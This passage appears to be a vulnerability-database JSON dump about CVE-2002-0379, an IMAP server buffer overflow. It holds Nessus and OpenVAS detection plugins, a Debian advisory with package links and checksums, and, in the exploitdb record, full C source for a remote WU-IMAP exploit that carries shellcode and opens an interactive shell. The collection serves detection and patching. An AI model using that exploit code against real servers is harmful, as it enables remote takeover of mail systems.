isdpkgvuln(pkg:\"cyrus-nntp\", ver:\"1.5.19-2.2\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cyrus-pop3d\", ver:\"1.5.19-2.2\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cyrus-admin\", ver:\"1.5.19-9.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cyrus-common\", ver:\"1.5.19-9.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cyrus-dev\", ver:\"1.5.19-9.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cyrus-imapd\", ver:\"1.5.19-9.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cyrus-nntp\", ver:\"1.5.19-9.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cyrus-pop3d\", ver:\"1.5.19-9.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n 
security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-01-16T20:05:15", "bulletinFamily": "scanner", "description": "The remote version of UW-IMAP is vulnerable to a buffer overflow condition \nthat could allow an authenticated attacker to execute arbitrary code on the \nremote host with the privileges of the IMAP server.", "modified": "2018-07-12T00:00:00", "published": "2002-05-29T00:00:00", "id": "IMAP_BODY_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=10966", "title": "University of Washington imap Server (uw-imapd) BODY Request Remote Overflow", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(10966);\n script_version (\"1.22\");\n script_cve_id(\"CVE-2002-0379\");\n script_bugtraq_id(4713);\n \n script_name(english:\"University of Washington imap Server (uw-imapd) BODY Request Remote Overflow\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"It is possible to execute arbitrary code on the remote host, through the \nIMAP server.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote version of UW-IMAP is vulnerable to a buffer overflow condition \nthat could allow an authenticated attacker to execute arbitrary code on the \nremote host with the privileges of the IMAP server.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to imap-2001a.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: 
\"2002/05/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2002/05/10\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\",value:\"cpe:/a:university_of_washington:uw-imap:2000.283\");\nscript_set_attribute(attribute:\"cpe\",value:\"cpe:/a:university_of_washington:uw-imap:2000.284\");\nscript_set_attribute(attribute:\"cpe\",value:\"cpe:/a:university_of_washington:uw-imap:2000.287\");\nscript_set_attribute(attribute:\"cpe\",value:\"cpe:/a:university_of_washington:uw-imap:2000.315\");\nscript_end_attributes();\n\n \n script_summary(english:\"checks for a buffer overflow in imapd\");\n script_category(ACT_GATHER_INFO);\n # can be changed to MIXED when real attack tried.\n script_copyright(english:\"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gain a shell remotely\");\n script_dependencie(\"find_service1.nasl\", \"logins.nasl\");\n script_require_ports(\"Services/imap\", 143);\n script_exclude_keys(\"imap/false_imap\");\n exit(0);\n}\n\n#\n\ninclude(\"imap_func.inc\");\n\nport = get_kb_item(\"Services/imap\");\nif(!port)port = 143;\nif(!get_port_state(port))exit(0);\nbanner = get_imap_banner(port:port);\nif ( ! 
banner || !ereg(pattern:\"OK .* IMAP4rev1 *200[01]\\.[0-9][^ ]* at\", string:banner))exit(0);\n\nsoc = open_sock_tcp(port);\nif(!soc)exit(0);\n\nr = recv_line(socket:soc, length:4096);\n\nsend(socket:soc, data:string(\"x capability\\r\\n\"));\nr = recv_line(socket:soc, length:4096);\n\n# According to the UW guys, if the server replies with IMAP4 and IMAP4REV1\n# then it's vulnerable to the overflow.\nif(\"CAPABILITY IMAP4 IMAP4REV1\" >< r ) security_warning(port);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:05:31", "bulletinFamily": "scanner", "description": "A buffer overflow was discovered in the imap server that could allow a\nmalicious user to run code on the server with the uid and gid of the\nemail owner by constructing a malformed request that would trigger the\nbuffer overflow. However, the user must successfully authenticate to\nthe imap service in order to exploit it, which limits the scope of the\nvulnerability somewhat, unless you are a free mail provider or run a\nmail service where users do not already have shell access to the\nsystem.", "modified": "2018-11-15T00:00:00", "published": "2004-07-31T00:00:00", "id": "MANDRAKE_MDKSA-2002-034.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=13940", "title": "Mandrake Linux Security Advisory : imap (MDKSA-2002:034)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2002:034. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(13940);\n script_version (\"1.15\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2002-0379\");\n script_xref(name:\"MDKSA\", value:\"2002:034\");\n\n script_name(english:\"Mandrake Linux Security Advisory : imap (MDKSA-2002:034)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow was discovered in the imap server that could allow a\nmalicious user to run code on the server with the uid and gid of the\nemail owner by constructing a malformed request that would trigger the\nbuffer overflow. However, the user must successfully authenticate to\nthe imap service in order to exploit it, which limits the scope of the\nvulnerability somewhat, unless you are a free mail provider or run a\nmail service where users do not already have shell access to the\nsystem.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://web.archive.org/web/20030216141306/http://online.securityfocus.com:80/archive/1/271958\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected imap and / or imap-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:imap-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:mandrakesoft:mandrake_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/05/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"imap-2000c-4.9mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"imap-devel-2000c-4.9mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"imap-2000c-4.8mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"imap-devel-2000c-4.8mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.0\", cpu:\"i386\", reference:\"imap-2000c-4.7mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.0\", cpu:\"i386\", 
reference:\"imap-devel-2000c-4.7mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"imap-2000c-7.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"imap-devel-2000c-7.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"imap-2001a-5.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"imap-devel-2001a-5.1mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T16:28:59", "bulletinFamily": "exploit", "description": "Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (2). CVE-2002-0379. Remote exploit for linux platform", "modified": "2002-05-10T00:00:00", "published": "2002-05-10T00:00:00", "id": "EDB-ID:21443", "href": "https://www.exploit-db.com/exploits/21443/", "type": "exploitdb", "title": "Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability 2", "sourceData": "source: http://www.securityfocus.com/bid/4713/info\r\n \r\nWu-imapd is vulnerable to a buffer overflow condition. This has been reported to occur when a valid user requests partial mailbox attributes. Exploitation may result in the execution of arbitrary code as the server process. 
An attacker may also be able to crash the server, resulting in a denial of service condition.\r\n \r\nThis only affects versions of imapd with legacy RFC 1730 support, which is disabled by default in imapd 2001.313 and imap-2001.315.\r\n\r\n/*\r\n * 0x3a0x29wuim.c - WU-IMAP 2000.287 (linux/i86) remote exploit\r\n *\r\n * dekadish\r\n *\r\n * 0x3a0x29 crew\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n\r\n#define RETADDR 0x080eb395 /* My Debian 2.2 box */\r\n#define MAILDIR \"/var/spool/mail\"\r\n\r\nchar shellcode[] =\r\n \"\\x55\\x89\\xe5\\x55\\x89\\xe5\\x83\\xec\\x28\\xc6\\x45\\xd8\\x2f\\xc6\\x45\\xdc\"\r\n \"\\x2f\\xc6\\x45\\xd9\\x5f\\xc6\\x45\\xda\\x5a\\xc6\\x45\\xdb\\x5f\\xc6\\x45\\xdd\"\r\n \"\\x5f\\xc6\\x45\\xde\\x5f\\x83\\x45\\xd9\\x03\\x83\\x45\\xda\\x0f\\x83\\x45\\xdb\"\r\n \"\\x0f\\x83\\x45\\xdd\\x14\\x83\\x45\\xde\\x09\\x31\\xc0\\x89\\x45\\xdf\\x89\\x45\"\r\n \"\\xf4\\x8d\\x45\\xd8\\x89\\x45\\xf0\\x83\\xec\\x04\\x8d\\x45\\xf0\\x31\\xd2\\x89\"\r\n \"\\xd3\\x89\\xc1\\x8b\\x45\\xf0\\x89\\xc3\\x31\\xc0\\x83\\xc0\\x0b\\xcd\\x80\\x31\"\r\n \"\\xc0\\x40\\xcd\\x80\";\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tint s, i;\r\n\tfd_set fds;\r\n\tchar tmp[2048], buf[1060];\r\n\tchar *target, *login, *pass, *p;\r\n\tstruct sockaddr_in sock;\r\n\tunsigned long retaddr;\r\n\r\n\tfprintf(stderr, \"%s\\n\", \"[The #smile Crew]\");\r\n\tif (argc != 4)\r\n\t{\r\n\t\tfprintf(stderr, \"Usage: %s <Target ip> <Login> <Password>\\n\", argv[0]);\r\n\t\texit(-1);\r\n\t}\r\n\r\n\tretaddr = RETADDR;\r\n\ttarget = argv[1];\r\n\tlogin = argv[2];\r\n\tpass = argv[3];\r\n\r\n\ts = socket(AF_INET, SOCK_STREAM, 0);\r\n\tsock.sin_port = htons(143);\r\n\tsock.sin_family = AF_INET;\r\n\tsock.sin_addr.s_addr = 
inet_addr(target);\r\n\r\n\tprintf(\"\\nConnecting to %s:143...\", target);\r\n\tfflush(stdout);\r\n\tif ((connect(s, (struct sockaddr *)&sock, sizeof(sock))) < 0)\r\n\t{\r\n\t\tprintf(\"failed\\n\");\r\n\t\texit(-1);\r\n\t}\r\n\telse\r\n\t\trecv(s, tmp, sizeof(tmp), 0);\r\n\r\n\tprintf(\"done\\nLogging in...\");\r\n\tfflush(stdout);\r\n\tsnprintf(tmp, sizeof(tmp), \"A0666 LOGIN %s %s\\n\", login, pass);\r\n\tsend(s, tmp, strlen(tmp), 0);\r\n\trecv(s, tmp, sizeof(tmp), 0);\r\n\r\n\tif (!strstr(tmp, \"completed\"))\r\n\t{\r\n\t\tprintf(\"failed\\n\");\r\n\t\texit(-1);\r\n\t}\r\n\r\n\tprintf(\"done\\nExploiting...\");\r\n\tfflush(stdout);\r\n\r\n\tdprintf(s, \"A0666 SELECT %s/%s\\n\", MAILDIR, login);\r\n\r\n\tmemset(buf, 0x0, sizeof(buf));\r\n\tp = buf;\r\n\tmemset(p, 0x90, 928);\r\n\tp += 928;\r\n\tmemcpy(p, shellcode, 100);\r\n\tp += 100;\r\n\r\n\tfor (i=0; i<6; i++)\r\n\t{\r\n\t\tmemcpy(p, &retaddr, 0x4);\r\n\t\tp += 0x4;\r\n\t}\r\n\r\n\tsnprintf(tmp, sizeof(tmp), \"A0666 PARTIAL 1 BODY[%s] 1 1\\n\", buf);\r\n\tsend(s, tmp, strlen(tmp), 0);\r\n\tdprintf(s, \"A0666 LOGOUT\\n\");\r\n\tsleep(5);\r\n\tprintf(\"done\\n\\n\");\r\n\r\n\tread(s, tmp, sizeof(tmp));\r\n\tdprintf(s, \"uname -a;id;\\n\");\r\n\tmemset(tmp, 0x0, sizeof(tmp));\r\n\r\n\twhile (1)\r\n\t{\r\n\t\tFD_ZERO(&fds);\r\n\t\tFD_SET(s, &fds);\r\n\t\tFD_SET(1, &fds);\r\n\r\n\t\tselect((s+1), &fds, 0, 0, 0);\r\n\r\n\t\tif (FD_ISSET(s, &fds))\r\n\t\t{\r\n\t\t\tif ((i = recv(s, tmp, sizeof(tmp), 0)) < 1)\r\n\t\t\t{\r\n\t\t\t\tfprintf(stderr, \"Connection closed\\n\");\r\n\t\t\t\texit(0);\r\n\t\t\t}\r\n\t\t\twrite(0, tmp, i);\r\n\t\t}\r\n\t\tif (FD_ISSET(1, &fds))\r\n\t\t{\r\n\t\t\ti = read(1, tmp, sizeof(tmp));\r\n\t\t\tsend(s, tmp, i, 0);\r\n\t\t}\r\n\t}\r\n\r\n\treturn;\r\n}\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21443/"}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", 
"description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 9055\n[CVE-2002-0379](https://vulners.com/cve/CVE-2002-0379)\nBugtraq ID: 4713\n", "modified": "2002-05-10T00:00:00", "published": "2002-05-10T00:00:00", "id": "OSVDB:790", "href": "https://vulners.com/osvdb/OSVDB:790", "title": "UoW imap BODY Request Remote Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-16T22:14:00", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 215-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nDecember 23rd, 2002 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : cyrus-imapd\nVulnerability : buffer overflow\nProblem-Type : remote\nDebian-specific: no\nCVE Id : CAN-2002-0379\nCERT Advisory : VU#740169\nBugTraq Id : 4713\n\nTimo Sirainen discovered a buffer overflow in the Cyrus IMAP server,\nwhich could be exploited by a remote attacker prior to logging in. A\nmalicious user could craft a request to run commands on the server under\nthe UID and GID of the cyrus server.\n\nFor the current stable distribution (woody) this problem has been\nfixed in version 1.5.19-9.1.\n\nFor the old stable distribution (potato) this problem has been fixed\nin version 1.5.19-2.2.\n\nFor the current unstable distribution (sid) this problem has been\nfixed in version 1.5.19-9.10. 
The cyrus21-imapd packages are not\nvulnerable\n\nWe recommend that you upgrade your cyrus-imapd package.\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 2.2 alias potato\n- ---------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-imapd_1.5.19-2.2.dsc\n Size/MD5 checksum: 681 7ed2dc53009118f622c466c7490910eb\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-imapd_1.5.19-2.2.diff.gz\n Size/MD5 checksum: 15807 75de24bbbf6906b2dcbc58ff94480faa\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-imapd_1.5.19.orig.tar.gz\n Size/MD5 checksum: 526190 b789ea3868be439c27b24a8aa6d0b99f\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-admin_1.5.19-2.2_alpha.deb\n Size/MD5 checksum: 42610 042e48cefd32648ad22780b2dd75d3e4\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-common_1.5.19-2.2_alpha.deb\n Size/MD5 checksum: 570800 37eba3e8c00ceee87637527fda215e90\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-dev_1.5.19-2.2_alpha.deb\n Size/MD5 checksum: 83332 2d5105eebbace38839fe45897898560d\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-imapd_1.5.19-2.2_alpha.deb\n Size/MD5 checksum: 165502 58d468b7568031ef6ebfb6d162a87ea2\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-nntp_1.5.19-2.2_alpha.deb\n Size/MD5 checksum: 165366 a99934002ff65416f62949b48e161c2d\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-pop3d_1.5.19-2.2_alpha.deb\n Size/MD5 
checksum: 78606 5616b0c2232bf237cd62aa79c60a74f6\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-admin_1.5.19-2.2_arm.deb\n Size/MD5 checksum: 38378 68c99d95c4bc94244aa11531643e752a\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-common_1.5.19-2.2_arm.deb\n Size/MD5 checksum: 427770 29731f1cd6ee7a1bc18fd43d21a30d99\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-dev_1.5.19-2.2_arm.deb\n Size/MD5 checksum: 77060 c3ef8e84ea192e1792811c889b7e64f6\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-imapd_1.5.19-2.2_arm.deb\n Size/MD5 checksum: 130436 f4424382f2945d196ce68d9dfe51ce04\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-nntp_1.5.19-2.2_arm.deb\n Size/MD5 checksum: 126334 290490d751199efae7feb518fe5e209a\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-pop3d_1.5.19-2.2_arm.deb\n Size/MD5 checksum: 59246 55abe9bb680c1bf75a1d8ccda8d5c0ef\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-admin_1.5.19-2.2_i386.deb\n Size/MD5 checksum: 37840 c86d3b23d50017c4caefebaffaa52c88\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-common_1.5.19-2.2_i386.deb\n Size/MD5 checksum: 409216 e03b8b803fdd52b16f0da981a32d7cbd\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-dev_1.5.19-2.2_i386.deb\n Size/MD5 checksum: 72742 7b41f08a21aab4683c60e0ff0c87f4ad\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-imapd_1.5.19-2.2_i386.deb\n Size/MD5 checksum: 121794 a1afc55e62e68546e1f746bebf215010\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-nntp_1.5.19-2.2_i386.deb\n Size/MD5 checksum: 119050 1b7a6e684ffbf78d244ae1503aa06743\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-pop3d_1.5.19-2.2_i386.deb\n Size/MD5 checksum: 55434 2e532f7b098b8009f8d4ea809bac8e6a\n\n Motorola 
680x0 architecture:\n\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-admin_1.5.19-2.2_m68k.deb\n Size/MD5 checksum: 36688 0ec453438aeaeb79447e14dff4128b10\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-common_1.5.19-2.2_m68k.deb\n Size/MD5 checksum: 381676 d9475e923d51d51b447cf5e08e0154a9\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-dev_1.5.19-2.2_m68k.deb\n Size/MD5 checksum: 71470 e51411412275e67040a780d8b14ac193\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-imapd_1.5.19-2.2_m68k.deb\n Size/MD5 checksum: 111510 abf765dfa9f400f381d3302e23f2f0d8\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-nntp_1.5.19-2.2_m68k.deb\n Size/MD5 checksum: 111542 5a9b7eacc475e4f19013d8a7ee5ef1a5\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-pop3d_1.5.19-2.2_m68k.deb\n Size/MD5 checksum: 52076 ebcd507e26ea1cf0294232f934c665ae\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-admin_1.5.19-2.2_powerpc.deb\n Size/MD5 checksum: 38778 853c9e576750c397455c1606253a47bd\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-common_1.5.19-2.2_powerpc.deb\n Size/MD5 checksum: 450088 49c3ed1a6e3dde88d682bb42b478830d\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-dev_1.5.19-2.2_powerpc.deb\n Size/MD5 checksum: 77918 9bb9fdc6d905aa1af5273da6a43ae653\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-imapd_1.5.19-2.2_powerpc.deb\n Size/MD5 checksum: 132520 65ba9534cae7b0d23d2c3da115f8cf88\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-nntp_1.5.19-2.2_powerpc.deb\n Size/MD5 checksum: 132128 ca7f5069d2c2c4815677091caddbaad9\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-pop3d_1.5.19-2.2_powerpc.deb\n Size/MD5 checksum: 61916 599a2f419306f34f7f954953431c9a5c\n\n Sun Sparc architecture:\n\n 
http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-admin_1.5.19-2.2_sparc.deb\n Size/MD5 checksum: 41222 574250cad0e3247980cdc9ede379e166\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-common_1.5.19-2.2_sparc.deb\n Size/MD5 checksum: 446538 69beb1f33611a47889ddfba499ae1ac4\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-dev_1.5.19-2.2_sparc.deb\n Size/MD5 checksum: 76118 f16a315115d556d8088ac37ededd5b63\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-imapd_1.5.19-2.2_sparc.deb\n Size/MD5 checksum: 133154 32aa7a5ed5bf3ae261c79c84bf6107b6\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-nntp_1.5.19-2.2_sparc.deb\n Size/MD5 checksum: 129760 b42b8ca439832adef3417198104e3a45\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-pop3d_1.5.19-2.2_sparc.deb\n Size/MD5 checksum: 61624 53381aaf7b9ca1956e03f0adaa294b66\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1.dsc\n Size/MD5 checksum: 703 03fa333659ba86e1f6a5654c73c0419c\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1.diff.gz\n Size/MD5 checksum: 32580 a3ed203eff5095754b1918a44c72a77f\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19.orig.tar.gz\n Size/MD5 checksum: 526190 b789ea3868be439c27b24a8aa6d0b99f\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-admin_1.5.19-9.1_alpha.deb\n Size/MD5 checksum: 43490 f4db5feda15c26bee8b46767c73ceafb\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-common_1.5.19-9.1_alpha.deb\n Size/MD5 checksum: 566970 ab7ff32970435317b65a51c67e60e128\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-dev_1.5.19-9.1_alpha.deb\n Size/MD5 checksum: 86188 b5370e5edfb7221c0633331b2efb90ec\n 
http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1_alpha.deb\n Size/MD5 checksum: 164276 7b872501ab0ad28b17a68f6a0599b725\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-nntp_1.5.19-9.1_alpha.deb\n Size/MD5 checksum: 162140 2402db60ecb922c719bb0ca80ca35097\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-pop3d_1.5.19-9.1_alpha.deb\n Size/MD5 checksum: 77552 dbafea98c34554a93e3e646caf3df8ed\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-admin_1.5.19-9.1_arm.deb\n Size/MD5 checksum: 39852 11c0f89746e288beae58cc62ca6b97c0\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-common_1.5.19-9.1_arm.deb\n Size/MD5 checksum: 437806 6b701e92f2abc07af14b4b9085646809\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-dev_1.5.19-9.1_arm.deb\n Size/MD5 checksum: 80344 442a643b75fb202d6a0bb9e571487846\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1_arm.deb\n Size/MD5 checksum: 134270 bd8c9b068c55bdb127ee2e359b7e3f53\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-nntp_1.5.19-9.1_arm.deb\n Size/MD5 checksum: 126702 1187b29da93ea4862c789d852fbf5a5c\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-pop3d_1.5.19-9.1_arm.deb\n Size/MD5 checksum: 59750 3a3caa512cbf65eac17e50faf9e80593\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-admin_1.5.19-9.1_i386.deb\n Size/MD5 checksum: 38924 